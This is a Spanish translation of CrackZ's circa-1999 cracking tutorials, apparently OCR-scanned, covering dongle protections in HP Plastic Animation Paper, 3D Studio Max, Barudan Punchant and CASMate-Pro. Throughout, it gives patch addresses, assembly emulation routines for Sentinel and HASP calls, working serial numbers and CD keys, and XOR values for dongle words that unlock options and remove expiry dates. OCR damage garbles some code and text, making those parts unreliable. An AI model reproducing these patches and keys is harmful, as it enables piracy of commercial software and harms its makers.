14 0000 
15 0002 
16 9FFO 
17 0000 


Nota irónicamente que nuestra memoria simulada esta usando el espacio previamente ocupado por la Protección Centinela. 
También te gustaría leer algunos feedbacks que recibí del autor de esta protección. 


ODongles O Return to Main Index 


O 1999 CrackZ. Revised 26th September 1999. 


Plastic Animation, (A juzgar por la calidad de la protección HP debería dedicarse 
exclusivamente a fabricar Hard Ware). 


| Tipo de Protección | Dongle (Sunministrado por HP). 

| Tamaño | < 900k Instalado. 

| Nombre del Objetivo | Plastic Animation Paper pre 1. 

| Dirección | No hay ninguna, pero puedes pedirmelos vía E-Mail (1 ) (193k aprox.). 


Quizás yo debería haberme percatado de la calidad del sistema de protección de este programa por el nombre del archivo 
principal (pap.exe), Vamos a arrancarlo y a ver que ocurre. Un "Fatal Error" como resultado (Una forma bastante mejor para 
indicarnos que no hay ningún dongle conectado).Un bpx para MessageBoxA, observaremos ahora el código:- 


Descripción 


014F:00408301 CALL 00401770 <-— Llama a la fantástica rutina del Dongle. 
014F:00408306 TEST EAX,EAX 

014F:00408308 JNZ 00408328 <-— Suponemos que es lo que debe ocurrir aquí. 
014F:0040830A PUSH 00052010 

014F:0040830F PUSH 00432AC0 <-—- "Fatal Error". 

014F:00408314 PUSH 00432AAC <-— "Unexpected error". 

014F:00408319 PUSH EAX 

014F:0040831A CALL [USER32!MessageBoxA] 


No voy a insultar tu inteligencia explicando como crackearlo, todavía seguimos mirarando la grandiosa CALL. 


014F:00401774 PUSH 00 <-—- Posición de lectura. 
014F:00401776 MOV DWORD PTR [00432064], 378 <-- Puerto de dirección. 


014F: 
014F: 
014F: 
014F: 
014F: 
014F: 
014F: 
014F: 
014F: 
014F: 
014F: 
014F: 
014F: 
014F: 
014F: 
014F: 
014F: 
014F: 
014F: 
014F: 
014F: 
014F: 
014F: 
014F: 


00401780 
00401785 
00401788 
0040178A 
0040178C 
0040178E 
00401793 
00401796 
00401798 
0040179A 
0040179C 
004017A1 
004017A4 
004017A6 
004017A8 
004017AA 
004017AF 
004017B2 
004017B4 
004017B6 
004017B8 
004017BD 
004017C0 
004017C2 


CALL 00401980 
CMP EAX, 74 
JNZ 004017F4 
PUSH 01 

MOV ECX,ESI 
CALL 00401980 
CMP EAX, 61 
JNZ 004017F4 
PUSH 02 

MOV ECX,ESI 
CALL 00401980 
CMP EAX, 75 
JNZ 004017F4 
PUSH 03 

MOV ECX,ESI 
CALL 00401980 
CMP EAX, 6E 
JNZ 004017F4 
PUSH 04 

MOV ECX,ESI 
CALL 00401980 
CMP EAX, 75 
JNZ 004017F4 
PUSH 05 


X= 


ER 


014F:004017C4 MOV ECX,ESI 

014F:004017C6 CALL 00401980 

014F:004017CB CMP EAX, 73 ¿== Eg! 
014F:004017CE JNZ 004017F4 

014F:004017D0 PUSH 06 

014F:004017D2 MOV ECX,ESI 

014F:004017D4 CALL 00401980 

014F:004017D9 CMP EAX, 44 E DT, 
014F:004017DC JNZ 004017F4 

014F:004017DE PUSH 07 

014F:004017E0 MOV ECX,ESI 

014F:004017E2 CALL 00401980 


014F:004017E7 CMP EAX, 4B <-- 'k' 
014F:004017EA JNZ 004017F4 
014F:004017EC MOV EAX,00000001 <-—- Suponemos a que se refiere esto. 


014F:004017F3 RET 


TaunusDK finalmente, no tengo ni idea de que significa esto pero yo en realidad no le doy importancia :-), como a este CALL 
se le hace referencia en 2 lugares comprendemos que hay que parchear a esta altura, atento que un fallo con este bloque no nos 
echará inmediatamente con un EAX=0, pero no ostante cambia la comprobación de la otra dirección de puerto paralelo (esto 
cuenta para los 32 ejemplos del CALL 00401980). Encontramos más abajo, (nosotros podíamos haberlo visto de las funciones 
importadas) que la dll que verdaderamente está haciendo el trabajo es ppppap1.dll de Hewlett Packard, expresamente Poke8() 
debajo de la CALL 004016D0 8 Peek8(0) y más abajo CALL 00401640, por supuesto debes recordar tus tiempos de poke y 
peek :-). 


(1) Nota.- No pone la dirección de su E-mail por lo que no creo que puedas contactar con él, no obstante mira en la página del 
gran Karpoff 


O 1998, 1999, 2000 CrackZ. 25th January 2000. 


Traducido por John Keeper 9-Septiembre-2000 ¡keeper Ocorreo.de 


Tutorial de 3D Studio Max R2.5 € v3.1 


http://www.ktx.com - Página Web. 
3D Studio Max R2.5 


Cersión 3.1 - 3 de Junio del 2000 (Sólo para Windows NT ) 


Después de que se censurase este tutorial en Febrero por la fanática BSA(no se bien que quiere decir ¿?) he decidido correr el 
riesgo actualizándolo y reeditándolo, si yo recibo alguna demanda judicial de Autodesk para eliminar este 

documento, desaparecerá sin previo aviso (hay ya demasiados cracks para 3DSMax v3.1 así que este documento no perjudicará 
a nadie, el mejor que yo he visto es el de Harvest , el peor es DOD's el cuál sería mejor olvidar). Nosotros veremos en esta 
práctica sobre protección v3.1's que AutoDesk realmente ha aprendido bastante desde su fallido intento de proteger R2.5, a 
pesar de eso, tristemente, lo que permite realmente esta practica es la gran vulnerabilidad del Sentinel, a sí mismo Kinetix 
también podría aceptar ciertamente parte de la culpa (observad las comprobaciones del CRC abajo). Comenzaremos 
observando la protección del asistente para la intalación(Install Shield),un serial ++ de formato 3-8 y una CD-Key. 


Los cuadros de entrada de datos aceptan todo lo que se introduzca,observamos el directorio temporal del asistente de 
instalación vemos unas cuantas dll's pero la que realmente nos interesa es Identify.dll , (InstUtil.dll aparenta ser una dll de la 
instalación y que sus 4'5k son demasido pequeños para contener una protección tan magnífica, Browse.dll y Regplugs.dll son 
también fácilmente suprimidos). Observando alrededor de las exportaciones y descompilando el script tu podrás encontrar que 
Identify.ValidateKeyWithPrefix() es la función a analizar, puedes verificar que parchear 1 en EAX autoriza que a la instalación 
que prosiga. 


Yo eché un pequeño vistazo para ver como trabaja esta función, es bastante simple con una tabla un poco de aricmética básica 
y un simple XOR, lo que fastidia acerca del esquema es que trabaje aparte con las combinaciones del número de serie generado 
con el correspondiente CD-Key, (es fácil encontrar los códigos correcto porque son comparados en el Offset 0x2651). Verás 
mas tarde que 3DSMax también comprueba si los tres primeros dígitos de tu número de serie son 110, el resto puedes ponerlo 
tu líbremente (dentro del rango 00000000-99999999), así que un ejémplo de número de serie podría ser 110-99999999, CD 
Key 25ERDV, vamos a instalarlo. 


Ahora cargamos 3dsmax.exe con el IDA (si quieres puedes grabar alguna aplicación de búsqueda como el Sentinel de 
Killer_3K de la firma FLIRT ), lo que tu encontrarás es que la protección está realizada alrededor de sproFindFirstUnit(), 
sproRead() y sproQuery(, la utilización del query es nueva. lo primero que hay que hacer es parchear 
sproFindFirstUnit(sub_5D8B61) , es muy fácil y no voy a describirlo ahora. Después debemos encontrar el código correcto de 
autorización, esto es bastante intrascendente, 5D2251 comprueba la longitud (8) y 5D2497 hace la comparación real, para mi 
ejemplo anteriormente citado el código es B63A197B. 


sproRead(_5D8D30) tiene 2 referencias, cada vez que O es cargado como la dirección de la dirección a leer, esto es igual que 
para la R2.5, yo no he podido comprobarlo en un uso normal de 3DSMax , yo estoy bastante seguro de que se ha sunministrado 
como una interfaz para desarrolladores de Plugins. Trivially rewrite sproRead() just in case, debemos colocar un bpx en 
sproQuery(_5D9120) pienso,que esto llevará algún tiempo para comprobarse. Como no tenemos métodos para averiguar como 
responder esta query debería estar bien reescribir sproQuery() para regresar a la última string que nosotros podemos reconocer 


:005D9142 JZ 005D9144 <-- Hacia nuestra rutina. 

:005D9144 PUSH EBP <-- graba EBP. 

:005D9145 MOV EAX, [ESP+18] <-- Obtiene el número de bytes la query string. 
:005D9149 XCHG ECX, EAX <-- en ECX. 

:005D914A CALL $+5 <-- prefija delta. 

:005D914F POP EBP <-- Delta. 

:005D9150 LEA ESI, [EBP+12] <-- Comienza el query de regreso (max. 56 bytes). 


:005D9153 MOV EDI, [ESP+20] <-- Dónde almacenarlo. 
:005D9157 REPZ MOVSB <-- Move. 

:005D9159 XCHG ECX, EAX <--— Restore ECX and clear EAX. 
:005D915A POP EBP <-- Requerido. 

db 56 dup(0) <-- Respuesta simulada para el query. 


Como tu podrás ver con el SoftICE, solo 4 bytes de la query de respuesta son comprobados por el stremp() en 
0046F65A,sinembargo las query strings no son las mismas en cada occasion . De hecho es más complicado porque esta área 
del código es comprobada por el CRC en muchas ocasiones, aquí hay una de esas comprobaciones:- 


:00431058 MOV ESI, 0046F190 <-- Comienza aquí. 
:0043105D XOR EAX, EAX <-—- Limpia EAX. 

:0043105F CMP ESI, 0046F900 <-- Comprueba hasta aquí. 
:0043106A MOV ECX, 0046F190 

:00431071 XOR EDX, EDX <-—- Limpia EDX. 

:00431073 MOV DL, [ECX] <-- Obtiene byte Q [ECX]. 
:00431075 INC ECX <-—- Incrementa ECX. 

:00431076 CMP ECX, 0046F900 <-- Hace todas las comprobaciones. 
:0043107C NOT EDX <-— EDX es comprobado. 

:00431082 JB 00431071 

:00431084 SUB EAX, [006298A4] <-—- Debe valer 0. 


Si tu parcheas stremp() tu crearás problemas con todas las comprobaciones de CRC y "eso es malo,muy malo" (En el estilo de 
Rainman, si tu has visto la película de Dustin Hoffman :-) ). No es muy práctico sentarse a esperar o buscar todas las 
comprobaciones. En lugar de eso nosotros modificaremos nuestro código de emulación sproQuery() para asegurarnos de que 
nos haga el trabjo dificil :- 


:005D9142 JZ 005D9144 <-- Hacia nuestra rutina. 

:005D9144 MOV EAX, [ESP+14] <-- Número de bytes en la string del query 
:005D9148 XCHG ECX, EAX <--— La coloca en ECX. 

:005D9149 LEA ESI, [ESP+38] <-- Obtiene una respuesta de la dirección. 
:005D914D MOV EDI, [ESP+1C] <-- Dónde colocarla. 

:005D9151 REPZ MOVSB 

:005D9153 XCHG ECX, EAX <-- Restaura ECX/Limpia EAX. 


Nuestro stremp() trabaja ahora como nosotros queremos y no hay necesidad de ensuciarnos las manos parcheando y cambiando 
la modificación de Kinetix's para comprobar nuestra rutina. Así que nosotros vemos aquí que aunque Kinetix ha hecho algunas 
modificaciones , su protección es igual, sigue siendo fácil de aislar y ha incluido errores, he oido un rumor que dice que en la 
versión 4 veremos un aumento de protecciónn, esperaremos para ver eso :-). Mira Kinetix, aqui no hay un crack listo para 
hacerse, los perdedores que se encargan de piratear tu software no encontraran una respuesta ni la forma de hacerlo aquí. 


R2.5 - 6 de Octubre de 1999 


Bienvenidos a este turial de Dongle en el cual estoy repasando un antiguo enemigo, un Sentinel. Yo asumo que que tu has 
descargado los ficheros necesarios para este tutorial o tienes acceso a ellos, el primer paso es ejecutar maxauth.exe para 
autorizar tu copia de 3D Studio Max. Yo no estoy interesado en mostrar como crackear esta parte, bpx GetDlgltemTextA y 
trazar, parchear y trabajar con el message box (desensamblar), o simplemente ver el contenido de 1039120D (Serial ++ 661- 
93842762, CD-Key V13M). 


Cargar 3DSMax produce un error esperado, aún así tu deberías ser capaz de encontrar la dirección de la nag screen con bpx 
MessageBoxA. 00450F21 parece ser la rutina ofensiva, observa la instrucción CALL EBP , la cuál es por supuesto la 
responsable de la llamada a la MessageBoxA. Nosotros podemos intenter examinar ahora el contenido de 3dsmax.exe con el 


W32Dasm, aún así ocurre algo, inténtalo y lo verás, a pesar de desensamblarlo, W32Dasm parece que lanza involuntariamente 
3DSMax y tendrás si suerte lo peor que puede te ocurrir es que regreses a SoftICE con un error. 


En este punto tenemos algunas opciones, cualquiera de ellas muestra que trucos se estan usando para inhabilitar W32Dasm o 
usar IDA el cual no parece tener el mismo problema. yo usé el W32Dasm durante un rato cuando con un bpx ReadFile en el 
diálogo de abrir archivo y tracé con detenimiento através de la memoria, archivo abierto y encontrada la instrucción ofensiva 
en 0045C6D2, desafortunadamente revertir el Flag causa un error interno en cw3220.dll al cuál no veo forma de resolver . 


Esto nos deja a solas con el IDA, sin embargo desensamblar 3dsmax.exe temo que puede llevar un rato. Por ahora nos permite 
comenzar nuestra pruebas usando SoftICE, una posible línea de ataque puede ser un bpx CreateFileA, la razón es la siguiente. 
Sabemos que el programa debe abrir un driver para comunicarse con el dongle (en este caso sentinel.vxd) y como este archivo 
no está instalado en nuestro sistema la llamada API va a fallar ciértamente así que nosotros podemos colocar un IF condicional 
encima de este breakpoint. Vamos a hacer lo siguiente: 


bpx CreateFileA if EAX==ffffffff <- 2 signos iguales. 
* Observa que tu puedes utilizar bpio -h 378 rw también. 
Seguro que tras varias interrupciones irrelevantes en el SoftI[CE, paramos en lo siguiente: 


:0055214C PUSH 00552120 
:00552151 CALL KERNEL32!CreaterFileA 


Este código está donde nosotros queremos empezar a trazar, probablemente es más fácil seguir con el Softlce lader usando el 
comando g. No es necesario decir que el salto condicional después de esta ruptura necesita ser invertido. Una vez de vuelta a 
este punto nosotros comenzaremos a presionar el F12 hasta que nuestro messagebox aparezca, seguramente lo encontrarás tras 
pulsarlo 6 veces aprox (o más depende)y deberás encontrarte en la dirección 00450DFD es lo más lejos a lo que puedes llegar. 


Evidentemente, 00450DFED es un buen entry point, recordemos que nosotros sabemos la dirección del messagebox 
(0045FD21), this is not too en gran medida y un análisis del código aconsejable. Sólo un simple paso y quizás algo de 
Pensamiento Zen debería hacernos ver este código sospechoso(lo siguiente ha sido extraido del IDA). 


:00450E5C MOV EDX, DWORD_561248 

:00450E62 XOR EDX, 73ADh 

:00450E68 PUSH EDX 

:00450E69 LEA EDX, [ESP+678+var_464] 

:00450E70 PUSH EAX 

:00450E71 CALL SUB_552A50 

:00450E76 TEST AX,AX <-- AX = 3 aquí el dongle no está presente. 
:00450E79 JZ loc_450F23 


Miremos este código e intentemos entender porqué esto debe ser una comprobación , también miremos que ocurre cuando 
nosotros fallamos en el prime JZ, increible pero cierto, el progrma hace una repetición muy vista del código , 3DSMax 
evidentemente trata de acceder al código tres veces al dongle antes de mostrarnos la messagebox. Nosotros podemos usar el 
Sentinel como una guía propia del API para hacer coincidir una función específica, esto me parece un sproFindFirstUnit(O) o 
algo parecido , ADA3 creo que es el creador de ID de Kinetix's. Naturalmente nosotros usaremos este '7242'como una cadena 
de búsqueda para identificar otra comprobación del Sentinel. 


Como yo he estado viendo unos cuantos Sentinels através de los años yo espero localizar una 15 referencias'7242, la 
proximidad de la dirección debe eliminarse porque ciertamente es una biblioteca que cada desarrolladorestá usando 
independientemente para desarrollar todas sus funciones. Utilizando IDA te será posible ver que el resto de las funciones no 


son alcanzadas nunca, lo mejor del IDA es su seguimiento a todos los caminos de ejecución así que a menos que tu recibas 
páginas de error tu puedes estar muy satisfecho de sus resultados. 


Así como aparte, también hay una comprobación dentro de util.dll, uno de los cuales es sunministrado como interfaz para 
algún diseñador de Plugins, es exportado como HardwareLockID, y parece llamar sproFindFirstUnit (CALL 2802BEFO0) y a 
sproRead() (CALL 2802C0C0) para recuperar el serial,los cuales tu debes parchear al final de la función EAX debe estat tu 
número de serie dongle :-), de otra forma XOR EAX, EAX no te permitirá verlo. 


O 1998, 1999, 2000 CrackZ. 3rd June 2000. 


Traducido por John Keeper 2.000 JKEEPERGOCORREO.DE 


Creo que Barudan Punchant es software para controlar máquinas de coser, es 
Descripción 
funcionalmente mucho más útil de lo que no puede parecer. 
| Tipode Protección | Tipode Protección Protección TAS PA, OS O 4, TAS PA, OS O trucos :- 
| Size | 15Mb de archivos de instalación. 
| Nombre Barudan Punchant v6.0G (Tajima DGML v6.0, Wilcom ES-65). 


| Dirección | http://www .barudan.co.jp/ 


Voy a comenzar uno de mis tutoriales de nuevo estilo con una pequeña historia. Mi batalla contra estos programas comenzó 
hace alrededor de 2 años cuando yo utilizaba un programa muy similar a este llamado "Wilcom ES-65 Designer". Al principio 
de 1997 fué uno de los primeros con una buena protección del tipo TimeHASP,al menos de los que yo había visto, muchos 
servicios y dos códigos responsables también :-), esto me dió un gran dolor de cabeza con sus pequeños trucos los cuales se 
repiten ,a pesar de la ligera diferencia en este ejemplo. 


TimeHASP-4 es uno de los HASP dongle que utiliza más memoria tiene 496 bytes de memoria asi como también un contador 
de tiempo real. Encontrando nuestra rutina HASP es bastante sencillo desensamblarlo, una vez desensamblado bp.exe 
encuentras un 'cmp bh, 32' en 00402DD6, tras esto puedes hallar fácilmente la instruccón JMP HASPDOSDRV. Nosotros 
añadiremos la rutina de emulación según el procedimiento habitual (lee el tutorial de CasMate's si tu no sabes como hacerlo) 
cambiamos el E9 en el offs al natural. 18FA68 a E8 y comienza tu rutina de emulación en el offs al natural. 182CAA. 


Nuestro primer problema será encontrar que dongle utilizar para este programa , después de falsificar la comprobación 
IsHaspO) tú encontrarás 4 conjuntos de contraseñas utilizados en los passwords con HaspCode (34A7/3268, 50ED/5017, 
1F97/68E0 y 3C39/2047). Aún hoy no he encontrado cuál es el correcto, sólo puedo asumir diferentes controles de HASP de 
varios programas de ésta compañía. Aún así ésto probará que no hay ningún problema con el primer conjunto y también 
funcionará con los otros - programas que yo tengo. Todos los programas programs llaman 4 call 4 servicios principales HASP, 
los abordé en poco tiempo. IsHasp como cabía esperar demostrará que son inefectivas. Las comprobaciones HaspCode sin 
embargo son muy buenas, el programa mira iniciálmente 8 códigos aleatorios que están en la tabla e utiliza el índice para llegar 
a las respuestas deseadas, cuando yo lo rompí por primera vez en 1997 programé una rutina básica que anulaba la tabla, 
recuperaba el índice de la pila y conseguía que continuase con la ejecución. 


No es necesario decir que hace mucho que yo emulé HaspCode() generalmente no es una cosa muy larga ni complicada. 
Service 4E o HaspIDO) son también fácil de emular (escoge tu número de serie y podrás :-) ). Nuestro principal problema está 
en Service 3 y 49 (ReadWord() y GetDate()). Yo lo parcheé normalmente GetDate() pero Barudan Punchant verifica el regreso 
de la rutina la cuál no es muy divertida de parchear , los días que te quedan también comprobados usando words del Dongle (al 
final verás como remediar esto). Llegando por consiguiente la fecha actual, nuestro primer dilema , a pesar de eso nosotros 
tenemos la respuesta situada frente a nuestros cansados ojos, nosotros sólo tenemos que usar GetLocalTime() que está 
importado en bp.exe ya. 


VOID GetLocalTime ( 


LPSYSTEMTIME l1pSystemTime // la dirección de la estructura de tiempo 
); 


typedef struct _SYSTEMTIME (f // st 
WORD wYear; <-- devuelve la igualdad 4. 
WORD wMonth; <-—- devuelve la igualda 2. 
WORD wDayOfWeek; 

WORD wDay; <-- devuelve la igualdad 1. 
WORD wHour; 

WORD wMinute; 


WORD wSecond; 
WORD wMilliseconds; 
) SYSTEMTIME; 


Aquí tenemos la forma de traducirlo a ensamblador :- 


CMP BH, 49 <--— GetDate(). 

JNZ $+x <-- Hace el siguiente servicio. 
PUSHAD <-- graba los registros. 

LEA EDI, [EBP+offset] <-- estructura de 10h dup(0). 
PUSH EDI <-- lpSystemTime. 

CALL GetLocalTime () 

SUB ESP, 4 <-- pila correcta. 

POP EDI <-- Restaura EDI. 

POPAD <-—- Restaura los registros. 

LEA ECX, [EBP+ofíset] <-- nuestra estructura. 
MOVZX EAX, WORD PTR [ECX+6] <-— Día. 

MOVZX EBX, WORD PTR [ECX+2] <-—- Month. 

MOVZX EDX, WORD PTR [ECX] <-— Año. 

SUB DX, 76Ch <-- Sub 1900 decimal. 

XOR ECX, ECX <-- elimina el status requerido. 
RET < regresa del emulador. 


Es siempre una satisfacción saber usar las facilidades que el programa nos presenta en bandeja :-). El servicio 3 funciona como 
sigue: todas las words de O - F7 son leidas por el programa y sumadas, EDI preserva la word que está siendo leída read tu 
puedes utilizar un breakpoint adicional para saltarte la mayor parte de esto. Las posiciones F6 y F7 actúan como checksums y 
son verificadas, te aconsejo nopear estas comprobaciones y regresar a resolverlas al final (004FF048 $ 004FF062).Apartir de 
aquí tu sólo necesitarás leer la word y preocuparte sólo de las O - 3D. La mayoría de ellas son sólamente interruptores de 
opciones, lee la word, anula la tabla con su índice, XORéalas [dudo que exista éste término pero no encuentro otra forma de 
expresarlo ; P] con su tabla correspondiente y compara el resultado con FFFFh. 


Sinembargo, todos los programas tienes excepciones que han necesitado mucha investigación por mi parte. En primer lugar te 
aconsejo,que repares la word 1C, esto actuará como una opción de validación, reparar esto traerá consigo el arrancar el 
programa sin el error "Invalid Product". Las Words 1A y 1B son las opciones de fecha, son XOReadas con las entradas de la 
tabla y manipuladas para conseguir una DWORD más abajo. 


07CF 0C1D 


AAAMA AAAA 


1A 1B 


Esto debe ser suficientemente explícito, 07CF es el año, OC el mes, 1D el día). Esta DWORD es provista por una rutina ue 
calcula los días que quedan apartir de la fecha actual con el Service 49 (supongo que es correcta). Esto es por consiguiente muy 
fácil conseguir darte unos 20 o 30 años para probar este software o mejor aún XORea ambas hacia FFFFh y nunca se 
comprobará la fecha de expiración. Word 1E controla algún tipo de información de la versión y debe ser XOReada a 32 (se 
comprueba si es correcto al final del loop del 3er service). 


Voy a darte un listado de las Words que controlan opciones, tu puedes XORearlas con seguridad hacia FFFFh, lo que 
realmente te aconsejo que hagas es verter la tabla XOR y escribir un programa que haga el trabajo sucio por tí. 


graba XOR a FFFERL :- 2-D (inclusive), F, 10, 11, 14, 15, 18, 19, 1F, 23, 2B, 2C, 2E-3B (inclusive), 3D. 


Todos estos programas tienen 2 trucos adicionales el promero implica una una segunda parte que es desensamblar ciertas 


funciones (la segunda parte es un controlador de tiempo que será trucado al para terminar). El segundo truco deshabilita las 
opciones del inicio. Nosotros nos ocuparemos del segundo truco primero, las opciones de inicio se deshabilitan muy 
rápidamente y termina con una Messagebox que puede ser bpx'd [lo cual yo traduzco por breakpointeada ; Pj con facilidad, 
pulsa 2 veces el F12 y tu encontrarás los contadores, son controlados usando una word 20 de lectura desde el dongle el cual 
será XOReado con ésta entrada de tabla (9DO8h) y entonces dividido por 3E8h, los 3 programas que poseo han producido 
diferentes resultados de esta división, en Barudan Punchant es 3, así que XORea la word 20 a BB8h en este caso. 


Las 2 otras words de dongle dongle , 24 y 3C desactivan la opción de grabar e imprimir así que no las XORees hacia FEFFh 
aún así son comprobadas por el mismo método que las otras. El final de la primera parte implica el mayor problema que 
implica un contador de tiempo que desactiva varias opciones del menú , este es el verdadero bit inteligente de esta protección. 
He intentado en primer lugar averiguar como desactivan las words 24 y 3C la opción de grabar, después de alrededor de 15 
lineas de anotaciones copiadas del resultado del XOR varias veces lo conseguí. Bueno, pero que hay del la 
activación/desactivación del contador de tiempo de las APIs?, el timer API's el cuál parcheé demasiado sólo permitía dejarnos 
en un loop dentro del mfc42.dll, lo cual no funciona demasiado bien ; P. 


La solución que encontré fue muy fácil y me cabreó un poco(porque ahí es donde debería haber ido desde el principio). 
Comencé colocando un bpx en CreateFileA y clickeando en mi versión actual de activar grabación, entonces desenrrollé la pila 
hasta que alcancé el id del Menú manipulando el procedimiento el cuál toma el parámetro de id através de EBX, esto desactiva 
el ID para grabar el cuál es 8127h. Por supuesto bp.exe no tiene recursos de menú lo cual explica que yo no la hubiese 
encontrado rápidamente, a pesar de que estén situados en un archivo llamado bpres.dll (si, ya lo sé un nombre así da muchas 
pistas y no me explico como pude dejarlo pasar :-) ). llegarás aquí también 8125h como la opción de grabar como ID. Vamos a 
buscar 8127 en W32Dasm y veremos que encontramos :- 


:0041E102 MOV [ESP+0C], 00008127 <-—- Aquí. 
:0041E646 PUSH 00008127 <-— aquí (doble rutina). 
:00473213 PUSH 00008127 <-- busca las CALLs. 


Una inspección a revelado la referencia a 00473213 es una rutina de activación (puedes comprobarlo porque sólo es alcanzada 
por la word 24 no la XORees hacia FFFFh). La referencia 0041E646 es muy paecida a la de 0041E102 con funciones de 
procesos ID detrás de cada una. Coloqué un bpx en ambas localizaciones pero sólo saltó 0041E102 , mi mejor conjetura es que 
ambos . 0041E102 traza de regreso a CALL 0041E090 al cual no hace referencia ninguna otra impulsada, de hecho es 
alcanzado através del CALL [EAX+4] en 0041F71B, éste es otro toque inteligente. 


CALL [EAX+4] toma una base variable a .rdata (obtenido através de [ESI]) y entonces añadiéndole 4 engancha a un vector de 
datos DWORD conteniendo la dirección real de la función. Mediante la utilización de HEX editor nosotros también podremos 
encontrar la referencia al CALL 0041E3F0 (nuestra segunda cadena misteriosa acabó arriba). Como puede ayudarnos esto”, 
bien nosotros sabemos por nuestro trabajo que de ese modo distante que traza esa función más alta no será una opción así que 
mejor vamos a entregarnos a una redirección inversa y puede acarrear alguna investigaciones. 


Una posible solución puede ser cambiar las 2 DWORD de la sección .rdata para señalar nuestra propia rutina, todas ellas 
probablemente necesitarán constituir una RET y puede que también alguna corrección de pila (la cual nosotros podemos 
parchear directamente para desviar las rutinas de desactivacióne o cambiar los ID pushes a 0). Podemos comenzar también 
buscando la dirección de base 00539F50, así esto nos saca una única referencia, un MOV DWORD PTR [ESI], 00539F50 el 
cual puede o no puede ser interesante (dependiendo de lo que busques y del tiempo qu ehayas invertido en ello). 


Esto es realmente todo lo que hay que ver aquí, los otros 2 programas funcionan igual que este, Tajima desactiva unas cuantas 
opciones más y tiene un poco más de truco, Wilcom es más simple. . 


O 1999 CrackZ. 28th December 1999. 
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CASMate-Pro v6.52 


http://www.scanvec.com/ 20Mb aproximadamente. 


Es un programa medianamente establecido el cual no parece tener una protección muy buena, CASMate es un objetivo ideal. 
Como ahora verás es un programa con una protección bastante buena para practicar, incluye además un ejemplo de legado de 
protección HASP . Lo primero que debes hacer es arrancar el programa ; P(cas_win.exe),para estos difíciles objetivos no 
pienses en usar siempre el W32Dasm, arranca el IDA y desensamblalo. Verás rápidamente muchos errores diciendo, "can't 
disassemble" y "execution flows beyond limits". Además no encontrarás la cadena de error que ves al principio porque ha sido 
desencriptado en durante la ejecución. 


Como Cas_win.exe es de 16-bit utilizaremos Wldr.exe para conseguir algún entry point, comenzaremos a trazar, pero primero 
una palabras acerca de los breakpoints. CASMate utiliza un código de anti-debugging que detecta los breakpoints del SoftI[CE 
(recuerda que esto en realidad cambia el código) y terminarás con GPF(¿Men algunos sitios, la solución es muy fácil 
entonces,sólo coloca un 'bpmb dirección x' que es funcionalmente equivalente y descrito ya en otro sitio. 


Comenzamos la llamadas del programa AllocCStoDSAlias que usa un selector de segmento de código y regresa al selector 
segmento de datos que se suele utilizar para ejecutar el código en el segmento de código. El INT 21h/AX=3306h obtiene la 
version real del sistema operativo, INT 2Fh/AX=1600h es llamado para comprobar si estamos usando el modo mejorado de 
windows(ah, pero tiene?). Pronto llegamos a la acción:- 


3127:065E E8130B CALL 1174 <-- Traza hasta aquí. 
3127:0661 E8D81A CALL 213C <-- Desencripta y reencripta. 
3127:0664 EB8BEOO CALL 0725 <-- ejecuta el código de desencriptación. 


Antes de que traces hasta el CALL 213C echa un vistazo a cs:0725, está encriptado ahora y si te entretienes en buscar con el 
Hiew verás que empieza en el offset 3JAB25. Trazamos hasta 213C es dónde la rutina HASP comienza sus trucos, en primer 
lugar vamos a hacer una preparación antes de llamar la rutina de desencriptación la cual frustra todos los inententos de usar 
herramientas para crackear. 


75B7:208C 83C0BF ADD AX,-41 


75B7:208F. FFEO JMP AX 
75B7:2091 83C33C ADD BX,3C 
75B7:2094 FFE3 JMP BX 
75B7:2096 83C10F ADD CX,O0F 
75B7:2099 FFE1 JMP CX 


Esta magnífica estructura de código tienes 2 propósitos principales, en primer lugar desencripta verdadero código de 
desencriptación y después inhibe cualquier posibilidad de funcionamiento de los debuggers, por supuesto no necesitas trazarlo, 
como sabes dónde está escrito el código de desencriptación un Bpr hará el resto :-), si lo trazas con el F10 necesitarás tener a 
mano una buena bebida y mucha paciencia mientras esperas, en cs:2150 es donde en realidad continúa con la desencriptación. 


2AB7:2154 STI <-- Re-activar todas las interrupciones. 
2AB7:2181 MOV CX,088A <--— Número de bytes a desencriptar. 
2AB7:2184 SUB CX,06 <-— Decrese en 3 words. 

2AB7:2187 ADD SI,CX <-- Recupera el final. 

2AB7:2189 MOV DI,06D3 <-- Empezamos desde aquí. 

2AB7:2193 MOV AX,CS: [DI] <-- obtiene word. 

2AB7:2196 ADD AX,BX <-— ..... 

2AB7:2198 MOV BX,AX <-— ..... 

2AB7:219A ROR AX,1l <-— ..... 


2AB7:219C AND AX,8000 <-— Lo desencripta. 

2AB7:219F ADD AX,BX <-— ..... 

2AB7:21A1 ADD AH,AL <-— ..... 

2AB7:21A3 MOV BX,AX <-— ..... 

2AB7:21A5 MOV [DI],AX <-- escribe la primera word desencriptada. 
2AB7:21A7 ADD [DI+02],BX <-- Escribe la segunda word desencriptada. 
2AB7:21AA ADD [DI+04],BX <-- escribe la tercera. 

2AB7:21AD ADD DI,06 <-- preparado para la siguiente ronda. 
2AB7:21B0 CMP DI,SI <-- Comprueba si se alcanza el final. 

2AB7:21B2 JB 2193 <-- Loop de desencriptación. 


Este es el código en el que estamos interesados, porque para crackear el entorno necesitamos los bytes de desencriptación de 
aquí. Vamos a movernos desde aquí y vamos a observar que necesitamos cambiar. 


60C7:072F CMP WORD PTR [C7C3],00 <-- Flag decisiva. 

60C7:0'734 JNZ 0739 <-— Salta al entorno de hasta luego(¿?). 

60C7:0736 CALL 06D3 <-- No llama a esto. 

60C7:0739 MOV WORD PTR [C7C3],0001 <-—- Mueve la flag conveniente para nosotros. 


Obviamente lo que necesitamos es hacer unos cuantos cambios de bytes, parcheando el JINZ 75 03 por JMP EB 03 parece ser 
que es la opción más fácil, pero lo que nosotros necesitamos para producir esto es desencriptar ésto. Trazando el código 
después de 5 ó 6 rondas de desencriptación (todas idénticas). Después de que fuerces el entorno de comprobación, coloca un 
bpm en cs:0723 y observa como el entorno vuelva a encriptar este código. 


Parcheando la encriptación 


El problema que parece que tenemos aquí es que cambiar un byte afectará a la subsiguiente desencriptación, de hecho esto es 
sólo cierto en un punto:- 


39 74 03 73 9A 8A C7 4A <-- Bytes actuales alimenta dos por el loop de encriptación. 
00 75 03 E8 9A FF C7 06 <-- Resultado actual de la desencriptación. 
00 EB 03 E8 9A FF C7 06 <-- Resultado deseado. 


Si tu comienzas trazando la desencriptación léntamente cuando el DI señala cs:0733 podrás ver como se genera el 75, el cuál 
seguramente te gustaría cambiar a EB :-). Ahora sigamos el código léntamente (durante un buen rato), mira como se utiliza 
